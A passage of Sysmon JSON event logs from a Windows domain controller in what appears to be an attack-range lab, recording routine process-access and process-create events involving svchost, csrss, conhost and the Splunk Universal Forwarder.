4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1885,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.743\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.743","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1886,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.743\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.743","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1887,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.743\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.743","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1888,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.743\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.743","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1889,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.743\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-0010BAC60300}\r\nTargetProcessId: 4000\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.743","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-0010BAC60300}","TargetProcessId":"4000","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1890,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.971\r\nSourceProcessGUID: {41C8662E-1F75-5F25-0000-0010BAC60300}\r\nSourceProcessId: 4000\r\nSourceThreadId: 3984\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nTargetProcessId: 2488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.971","SourceProcessGUID":"{41C8662E-1F75-5F25-0000-0010BAC60300}","SourceProcessId":"4000","SourceThreadId":"3984","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","TargetProcessId":"2488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1891,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.018\r\nProcessGuid: {41C8662E-1F76-5F25-0000-001028C90300}\r\nProcessId: 3948\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" check-license\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {41C8662E-1F75-5F25-0000-00106CC50300}\r\nParentProcessId: 3824\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.018","ProcessGuid":"{41C8662E-1F76-5F25-0000-001028C90300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" check-license","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{41C8662E-1F75-5F25-0000-00106CC50300}","ParentProcessId":"3824","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1892,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.017\r\nSourceProcessGUID: {41C8662E-1F75-5F25-0000-00106CC50300}\r\nSourceProcessId: 3824\r\nSourceThreadId: 3888\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-001032690300}\r\nTargetProcessId: 3948\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+64ab|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1807c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.017","SourceProcessGUID":"{41C8662E-1F75-5F25-0000-00106CC50300}","SourceProcessId":"3824","SourceThreadId":"3888","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-001032690300}","TargetProcessId":"3948","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+64ab|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1807c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1893,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.017\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-001032690300}\r\nTargetProcessId: 3948\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.017","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-001032690300}","TargetProcessId":"3948","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
